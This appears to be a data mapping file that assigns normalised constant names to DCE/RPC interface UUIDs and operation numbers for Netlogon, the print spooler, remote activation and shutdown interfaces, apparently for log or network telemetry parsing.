00000143-0000-0000-c000-000000000046:2 XDM_CONST.DCERPC_OPERATION_RELEASE
00000143-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_REM_QUERY_INTERFACE
00000143-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_REM_ADD_REF
00000143-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_REM_RELEASE
00000143-0000-0000-c000-000000000046:6 XDM_CONST.DCERPC_OPERATION_REM_QUERY_INTERFACE2
000001a0-0000-0000-c000-000000000046:0 XDM_CONST.DCERPC_OPERATION_QUERY_INTERFACE_I_REMOTE_SCM_ACTIVATOR
000001a0-0000-0000-c000-000000000046:1 XDM_CONST.DCERPC_OPERATION_ADD_REF_I_REMOTE_ISCM_ACTIVATOR
000001a0-0000-0000-c000-000000000046:2 XDM_CONST.DCERPC_OPERATION_RELEASE_I_REMOTE_ISCM_ACTIVATOR
000001a0-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_REMOTE_GET_CLASS_OBJECT
000001a0-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_REMOTE_CREATE_INSTANCE
12345678-1234-abcd-ef00-01234567cffb:0 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_UAS_LOGON
12345678-1234-abcd-ef00-01234567cffb:1 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_UAS_LOGOFF
12345678-1234-abcd-ef00-01234567cffb:2 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGON
12345678-1234-abcd-ef00-01234567cffb:3 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGOFF
12345678-1234-abcd-ef00-01234567cffb:4 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_REQ_CHALLENGE
12345678-1234-abcd-ef00-01234567cffb:5 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_AUTHENTICATE
12345678-1234-abcd-ef00-01234567cffb:6 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_PASSWORD_SET
12345678-1234-abcd-ef00-01234567cffb:7 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_DELTAS
12345678-1234-abcd-ef00-01234567cffb:8 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_SYNC
12345678-1234-abcd-ef00-01234567cffb:9 XDM_CONST.DCERPC_OPERATION_NETR_ACCOUNT_DELTAS
12345678-1234-abcd-ef00-01234567cffb:10 XDM_CONST.DCERPC_OPERATION_NETR_ACCOUNT_SYNC
12345678-1234-abcd-ef00-01234567cffb:11 XDM_CONST.DCERPC_OPERATION_NETR_GET_DC_NAME
12345678-1234-abcd-ef00-01234567cffb:12 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_CONTROL
12345678-1234-abcd-ef00-01234567cffb:13 XDM_CONST.DCERPC_OPERATION_NETR_GET_ANY_DC_NAME
12345678-1234-abcd-ef00-01234567cffb:14 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_CONTROL2
12345678-1234-abcd-ef00-01234567cffb:15 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_AUTHENTICATE2
12345678-1234-abcd-ef00-01234567cffb:16 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_SYNC2
12345678-1234-abcd-ef00-01234567cffb:17 XDM_CONST.DCERPC_OPERATION_NETR_DATABASE_REDO
12345678-1234-abcd-ef00-01234567cffb:18 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_CONTROL2_EX
12345678-1234-abcd-ef00-01234567cffb:19 XDM_CONST.DCERPC_OPERATION_NETR_ENUMERATE_TRUSTED_DOMAINS
12345678-1234-abcd-ef00-01234567cffb:20 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_NAME
12345678-1234-abcd-ef00-01234567cffb:21 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_CAPABILITIES
12345678-1234-abcd-ef00-01234567cffb:22 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SET_SERVICE_BITS
12345678-1234-abcd-ef00-01234567cffb:23 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_TRUST_RID
12345678-1234-abcd-ef00-01234567cffb:24 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_COMPUTE_SERVER_DIGEST
12345678-1234-abcd-ef00-01234567cffb:25 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_COMPUTE_CLIENT_DIGEST
12345678-1234-abcd-ef00-01234567cffb:26 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_AUTHENTICATE3
12345678-1234-abcd-ef00-01234567cffb:27 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_NAME_EX
12345678-1234-abcd-ef00-01234567cffb:28 XDM_CONST.DCERPC_OPERATION_DSR_GET_SITE_NAME
12345678-1234-abcd-ef00-01234567cffb:29 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_DOMAIN_INFO
12345678-1234-abcd-ef00-01234567cffb:30 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_PASSWORD_SET2
12345678-1234-abcd-ef00-01234567cffb:31 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_PASSWORD_GET
12345678-1234-abcd-ef00-01234567cffb:32 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SEND_TO_SAM
12345678-1234-abcd-ef00-01234567cffb:33 XDM_CONST.DCERPC_OPERATION_DSR_ADDRESS_TO_SITE_NAMES_W
12345678-1234-abcd-ef00-01234567cffb:34 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_NAME_EX2
12345678-1234-abcd-ef00-01234567cffb:35 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_GET_TIME_SERVICE_PARENT_DOMAIN
12345678-1234-abcd-ef00-01234567cffb:36 XDM_CONST.DCERPC_OPERATION_NETR_ENUMERATE_TRUSTED_DOMAINS_EX
12345678-1234-abcd-ef00-01234567cffb:37 XDM_CONST.DCERPC_OPERATION_DSR_ADDRESS_TO_SITE_NAMES_EX_W
12345678-1234-abcd-ef00-01234567cffb:38 XDM_CONST.DCERPC_OPERATION_DSR_GET_DC_SITE_COVERAGE_W
12345678-1234-abcd-ef00-01234567cffb:39 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGON_EX
12345678-1234-abcd-ef00-01234567cffb:40 XDM_CONST.DCERPC_OPERATION_DSR_ENUMERATE_DOMAIN_TRUSTS
12345678-1234-abcd-ef00-01234567cffb:41 XDM_CONST.DCERPC_OPERATION_DSR_DEREGISTER_DNS_HOST_RECORDS
12345678-1234-abcd-ef00-01234567cffb:42 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRUST_PASSWORDS_GET
12345678-1234-abcd-ef00-01234567cffb:43 XDM_CONST.DCERPC_OPERATION_DSR_GET_FOREST_TRUST_INFORMATION
12345678-1234-abcd-ef00-01234567cffb:44 XDM_CONST.DCERPC_OPERATION_NETR_GET_FOREST_TRUST_INFORMATION
12345678-1234-abcd-ef00-01234567cffb:45 XDM_CONST.DCERPC_OPERATION_NETR_LOGON_SAM_LOGON_WITH_FLAGS
12345678-1234-abcd-ef00-01234567cffb:46 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_GET_TRUST_INFO
12345678-1234-abcd-ef00-01234567cffb:47 XDM_CONST.DCERPC_OPERATION_UNUSED
12345678-1234-abcd-ef00-01234567cffb:48 XDM_CONST.DCERPC_OPERATION_DSR_UPDATE_READ_ONLY_SERVER_DNS_RECORDS
12345678-1234-abcd-ef00-01234567cffb:49 XDM_CONST.DCERPC_OPERATION_NETR_CHAIN_SET_CLIENT_ATTRIBUTES
76f03f96-cdfd-44fc-a22c-64950a001209:0 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_OPEN_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:1 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:2 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_JOB
76f03f96-cdfd-44fc-a22c-64950a001209:3 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_JOB
76f03f96-cdfd-44fc-a22c-64950a001209:4 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_JOBS
76f03f96-cdfd-44fc-a22c-64950a001209:5 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_JOB
76f03f96-cdfd-44fc-a22c-64950a001209:6 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SCHEDULE_JOB
76f03f96-cdfd-44fc-a22c-64950a001209:7 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:8 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:9 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:10 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_START_DOC_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:11 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_START_PAGE_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:12 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_WRITE_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:13 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_END_PAGE_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:14 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_END_DOC_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:15 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ABORT_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:16 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DATA
76f03f96-cdfd-44fc-a22c-64950a001209:17 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DATA_EX
76f03f96-cdfd-44fc-a22c-64950a001209:18 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PRINTER_DATA
76f03f96-cdfd-44fc-a22c-64950a001209:19 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PRINTER_DATA_EX
76f03f96-cdfd-44fc-a22c-64950a001209:20 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_CLOSE_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:21 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_FORM
76f03f96-cdfd-44fc-a22c-64950a001209:22 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_FORM
76f03f96-cdfd-44fc-a22c-64950a001209:23 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_FORM
76f03f96-cdfd-44fc-a22c-64950a001209:24 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_FORM
76f03f96-cdfd-44fc-a22c-64950a001209:25 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_FORMS
76f03f96-cdfd-44fc-a22c-64950a001209:26 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DRIVER
76f03f96-cdfd-44fc-a22c-64950a001209:27 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_DATA
76f03f96-cdfd-44fc-a22c-64950a001209:28 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_DATA_EX
76f03f96-cdfd-44fc-a22c-64950a001209:29 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_KEY
76f03f96-cdfd-44fc-a22c-64950a001209:30 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DATA
76f03f96-cdfd-44fc-a22c-64950a001209:31 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DATA_EX
76f03f96-cdfd-44fc-a22c-64950a001209:32 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_KEY
76f03f96-cdfd-44fc-a22c-64950a001209:33 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_XCV_DATA
76f03f96-cdfd-44fc-a22c-64950a001209:34 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SEND_RECV_BIDI_DATA
76f03f96-cdfd-44fc-a22c-64950a001209:35 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_CREATE_PRINTER_IC
76f03f96-cdfd-44fc-a22c-64950a001209:36 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_PLAY_GDI_SCRIPT_ON_PRINTER_IC
76f03f96-cdfd-44fc-a22c-64950a001209:37 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_IC
76f03f96-cdfd-44fc-a22c-64950a001209:38 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTERS
76f03f96-cdfd-44fc-a22c-64950a001209:39 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PRINTER_DRIVER
76f03f96-cdfd-44fc-a22c-64950a001209:40 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINTER_DRIVERS
76f03f96-cdfd-44fc-a22c-64950a001209:41 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DRIVER_DIRECTORY
76f03f96-cdfd-44fc-a22c-64950a001209:42 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DRIVER
76f03f96-cdfd-44fc-a22c-64950a001209:43 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DRIVER_EX
76f03f96-cdfd-44fc-a22c-64950a001209:44 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PRINT_PROCESSOR
76f03f96-cdfd-44fc-a22c-64950a001209:45 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINT_PROCESSORS
76f03f96-cdfd-44fc-a22c-64950a001209:46 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINT_PROCESSOR_DIRECTORY
76f03f96-cdfd-44fc-a22c-64950a001209:47 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PORTS
76f03f96-cdfd-44fc-a22c-64950a001209:48 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_MONITORS
76f03f96-cdfd-44fc-a22c-64950a001209:49 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PORT
76f03f96-cdfd-44fc-a22c-64950a001209:50 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_PORT
76f03f96-cdfd-44fc-a22c-64950a001209:51 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_MONITOR
76f03f96-cdfd-44fc-a22c-64950a001209:52 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_MONITOR
76f03f96-cdfd-44fc-a22c-64950a001209:53 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINT_PROCESSOR
76f03f96-cdfd-44fc-a22c-64950a001209:54 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PRINT_PROCESSOR_DATATYPES
76f03f96-cdfd-44fc-a22c-64950a001209:55 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ADD_PER_MACHINE_CONNECTION
76f03f96-cdfd-44fc-a22c-64950a001209:56 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PER_MACHINE_CONNECTION
76f03f96-cdfd-44fc-a22c-64950a001209:57 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_PER_MACHINE_CONNECTIONS
76f03f96-cdfd-44fc-a22c-64950a001209:58 XDM_CONST.DCERPC_OPERATION_RPC_SYNC_REGISTER_FOR_REMOTE_NOTIFICATIONS
76f03f96-cdfd-44fc-a22c-64950a001209:59 XDM_CONST.DCERPC_OPERATION_RPC_SYNC_UN_REGISTER_FOR_REMOTE_NOTIFICATIONS
76f03f96-cdfd-44fc-a22c-64950a001209:60 XDM_CONST.DCERPC_OPERATION_RPC_SYNC_REFRESH_REMOTE_NOTIFICATIONS
76f03f96-cdfd-44fc-a22c-64950a001209:61 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_REMOTE_NOTIFICATIONS
76f03f96-cdfd-44fc-a22c-64950a001209:62 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_INSTALL_PRINTER_DRIVER_FROM_PACKAGE
76f03f96-cdfd-44fc-a22c-64950a001209:63 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_UPLOAD_PRINTER_DRIVER_PACKAGE
76f03f96-cdfd-44fc-a22c-64950a001209:64 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_CORE_PRINTER_DRIVERS
76f03f96-cdfd-44fc-a22c-64950a001209:65 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_CORE_PRINTER_DRIVER_INSTALLED
76f03f96-cdfd-44fc-a22c-64950a001209:66 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_PRINTER_DRIVER_PACKAGE_PATH
76f03f96-cdfd-44fc-a22c-64950a001209:67 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_PRINTER_DRIVER_PACKAGE
76f03f96-cdfd-44fc-a22c-64950a001209:68 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_READ_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:69 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_RESET_PRINTER
76f03f96-cdfd-44fc-a22c-64950a001209:70 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_GET_JOB_NAMED_PROPERTY_VALUE
76f03f96-cdfd-44fc-a22c-64950a001209:71 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_SET_JOB_NAMED_PROPERTY
76f03f96-cdfd-44fc-a22c-64950a001209:72 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_JOB_NAMED_PROPERTY
76f03f96-cdfd-44fc-a22c-64950a001209:73 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_JOB_NAMED_PROPERTIES
76f03f96-cdfd-44fc-a22c-64950a001209:74 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_LOG_JOB_INFO_FOR_BRANCH_OFFICE
894de0c0-0d55-11d3-a322-00c04fa321a1:0 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SHUTDOWN
894de0c0-0d55-11d3-a322-00c04fa321a1:1 XDM_CONST.DCERPC_OPERATION_BASE_ABORT_SHUTDOWN
894de0c0-0d55-11d3-a322-00c04fa321a1:2 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SHUTDOWN_EX
d95afe70-a6d5-4259-822e-2c84da1ddb0d:0 XDM_CONST.DCERPC_OPERATION_WSDR_INITIATE_SHUTDOWN
d95afe70-a6d5-4259-822e-2c84da1ddb0d:1 XDM_CONST.DCERPC_OPERATION_WSDR_ABORT_SHUTDOWN
12345678-1234-abcd-ef00-0123456789ab:0 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTERS
12345678-1234-abcd-ef00-0123456789ab:1 XDM_CONST.DCERPC_OPERATION_RPC_OPEN_PRINTER
12345678-1234-abcd-ef00-0123456789ab:2 XDM_CONST.DCERPC_OPERATION_RPC_SET_JOB
12345678-1234-abcd-ef00-0123456789ab:3 XDM_CONST.DCERPC_OPERATION_RPC_GET_JOB
12345678-1234-abcd-ef00-0123456789ab:4 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_JOBS
12345678-1234-abcd-ef00-0123456789ab:5 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER
12345678-1234-abcd-ef00-0123456789ab:6 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER
12345678-1234-abcd-ef00-0123456789ab:7 XDM_CONST.DCERPC_OPERATION_RPC_SET_PRINTER
12345678-1234-abcd-ef00-0123456789ab:8 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER
12345678-1234-abcd-ef00-0123456789ab:9 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_DRIVER
12345678-1234-abcd-ef00-0123456789ab:10 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_DRIVERS
12345678-1234-abcd-ef00-0123456789ab:11 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER
12345678-1234-abcd-ef00-0123456789ab:12 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER_DIRECTORY
12345678-1234-abcd-ef00-0123456789ab:13 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DRIVER
12345678-1234-abcd-ef00-0123456789ab:14 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINT_PROCESSOR
12345678-1234-abcd-ef00-0123456789ab:15 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINT_PROCESSORS
12345678-1234-abcd-ef00-0123456789ab:16 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINT_PROCESSOR_DIRECTORY
12345678-1234-abcd-ef00-0123456789ab:17 XDM_CONST.DCERPC_OPERATION_RPC_START_DOC_PRINTER
12345678-1234-abcd-ef00-0123456789ab:18 XDM_CONST.DCERPC_OPERATION_RPC_START_PAGE_PRINTER
12345678-1234-abcd-ef00-0123456789ab:19 XDM_CONST.DCERPC_OPERATION_RPC_WRITE_PRINTER
12345678-1234-abcd-ef00-0123456789ab:20 XDM_CONST.DCERPC_OPERATION_RPC_END_PAGE_PRINTER
12345678-1234-abcd-ef00-0123456789ab:21 XDM_CONST.DCERPC_OPERATION_RPC_ABORT_PRINTER
12345678-1234-abcd-ef00-0123456789ab:22 XDM_CONST.DCERPC_OPERATION_RPC_READ_PRINTER
12345678-1234-abcd-ef00-0123456789ab:23 XDM_CONST.DCERPC_OPERATION_RPC_END_DOC_PRINTER
12345678-1234-abcd-ef00-0123456789ab:24 XDM_CONST.DCERPC_OPERATION_RPC_ADD_JOB
12345678-1234-abcd-ef00-0123456789ab:25 XDM_CONST.DCERPC_OPERATION_RPC_SCHEDULE_JOB
12345678-1234-abcd-ef00-0123456789ab:26 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DATA
12345678-1234-abcd-ef00-0123456789ab:27 XDM_CONST.DCERPC_OPERATION_RPC_SET_PRINTER_DATA
12345678-1234-abcd-ef00-0123456789ab:28 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_FOR_PRINTER_CHANGE
12345678-1234-abcd-ef00-0123456789ab:29 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_PRINTER
12345678-1234-abcd-ef00-0123456789ab:30 XDM_CONST.DCERPC_OPERATION_RPC_ADD_FORM
12345678-1234-abcd-ef00-0123456789ab:31 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_FORM
12345678-1234-abcd-ef00-0123456789ab:32 XDM_CONST.DCERPC_OPERATION_RPC_GET_FORM
12345678-1234-abcd-ef00-0123456789ab:33 XDM_CONST.DCERPC_OPERATION_RPC_SET_FORM
12345678-1234-abcd-ef00-0123456789ab:34 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_FORMS
12345678-1234-abcd-ef00-0123456789ab:35 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PORTS
12345678-1234-abcd-ef00-0123456789ab:36 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_MONITORS
12345678-1234-abcd-ef00-0123456789ab:37 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PORT
12345678-1234-abcd-ef00-0123456789ab:38 XDM_CONST.DCERPC_OPERATION_RPC_CONFIGURE_PORT
12345678-1234-abcd-ef00-0123456789ab:39 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PORT
12345678-1234-abcd-ef00-0123456789ab:40 XDM_CONST.DCERPC_OPERATION_RPC_CREATE_PRINTER_IC
12345678-1234-abcd-ef00-0123456789ab:41 XDM_CONST.DCERPC_OPERATION_RPC_PLAY_GDI_SCRIPT_ON_PRINTER_IC
12345678-1234-abcd-ef00-0123456789ab:42 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_IC
12345678-1234-abcd-ef00-0123456789ab:43 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_CONNECTION
12345678-1234-abcd-ef00-0123456789ab:44 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_CONNECTION
12345678-1234-abcd-ef00-0123456789ab:45 XDM_CONST.DCERPC_OPERATION_RPC_PRINTER_MESSAGE_BOX
12345678-1234-abcd-ef00-0123456789ab:46 XDM_CONST.DCERPC_OPERATION_RPC_ADD_MONITOR
12345678-1234-abcd-ef00-0123456789ab:47 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_MONITOR
12345678-1234-abcd-ef00-0123456789ab:48 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINT_PROCESSOR
12345678-1234-abcd-ef00-0123456789ab:49 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINT_PROVIDOR
12345678-1234-abcd-ef00-0123456789ab:50 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINT_PROVIDOR
12345678-1234-abcd-ef00-0123456789ab:51 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINT_PROCESSOR_DATATYPES
12345678-1234-abcd-ef00-0123456789ab:52 XDM_CONST.DCERPC_OPERATION_RPC_RESET_PRINTER
12345678-1234-abcd-ef00-0123456789ab:53 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER2
12345678-1234-abcd-ef00-0123456789ab:54 XDM_CONST.DCERPC_OPERATION_RPC_CLIENT_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION
12345678-1234-abcd-ef00-0123456789ab:55 XDM_CONST.DCERPC_OPERATION_RPC_FIND_NEXT_PRINTER_CHANGE_NOTIFICATION
12345678-1234-abcd-ef00-0123456789ab:56 XDM_CONST.DCERPC_OPERATION_RPC_FIND_CLOSE_PRINTER_CHANGE_NOTIFICATION
12345678-1234-abcd-ef00-0123456789ab:57 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION_OLD
12345678-1234-abcd-ef00-0123456789ab:58 XDM_CONST.DCERPC_OPERATION_RPC_REPLY_OPEN_PRINTER
12345678-1234-abcd-ef00-0123456789ab:59 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_REPLY_PRINTER
12345678-1234-abcd-ef00-0123456789ab:60 XDM_CONST.DCERPC_OPERATION_RPC_REPLY_CLOSE_PRINTER
12345678-1234-abcd-ef00-0123456789ab:61 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PORT_EX
12345678-1234-abcd-ef00-0123456789ab:62 XDM_CONST.DCERPC_OPERATION_RPC_REMOTE_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION
12345678-1234-abcd-ef00-0123456789ab:63 XDM_CONST.DCERPC_OPERATION_RPC_SPOOLER_INIT
12345678-1234-abcd-ef00-0123456789ab:64 XDM_CONST.DCERPC_OPERATION_RPC_RESET_PRINTER_EX
12345678-1234-abcd-ef00-0123456789ab:65 XDM_CONST.DCERPC_OPERATION_RPC_REMOTE_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION_EX
12345678-1234-abcd-ef00-0123456789ab:66 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_REPLY_PRINTER_EX
12345678-1234-abcd-ef00-0123456789ab:67 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_REFRESH_PRINTER_CHANGE_NOTIFICATION
12345678-1234-abcd-ef00-0123456789ab:68 XDM_CONST.DCERPC_OPERATION_RPC_SET_ALLOC_FAIL_COUNT
12345678-1234-abcd-ef00-0123456789ab:69 XDM_CONST.DCERPC_OPERATION_RPC_SPL_OPEN_PRINTER
12345678-1234-abcd-ef00-0123456789ab:70 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_EX
12345678-1234-abcd-ef00-0123456789ab:71 XDM_CONST.DCERPC_OPERATION_RPC_SET_PORT
12345678-1234-abcd-ef00-0123456789ab:72 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_DATA
12345678-1234-abcd-ef00-0123456789ab:73 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DATA
12345678-1234-abcd-ef00-0123456789ab:74 XDM_CONST.DCERPC_OPERATION_RPC_CLUSTER_SPL_OPEN
12345678-1234-abcd-ef00-0123456789ab:75 XDM_CONST.DCERPC_OPERATION_RPC_CLUSTER_SPL_CLOSE
12345678-1234-abcd-ef00-0123456789ab:76 XDM_CONST.DCERPC_OPERATION_RPC_CLUSTER_SPL_IS_ALIVE
12345678-1234-abcd-ef00-0123456789ab:77 XDM_CONST.DCERPC_OPERATION_RPC_SET_PRINTER_DATA_EX
12345678-1234-abcd-ef00-0123456789ab:78 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DATA_EX
12345678-1234-abcd-ef00-0123456789ab:79 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_DATA_EX
12345678-1234-abcd-ef00-0123456789ab:80 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_KEY
12345678-1234-abcd-ef00-0123456789ab:81 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DATA_EX
12345678-1234-abcd-ef00-0123456789ab:82 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_KEY
12345678-1234-abcd-ef00-0123456789ab:83 XDM_CONST.DCERPC_OPERATION_RPC_SEEK_PRINTER
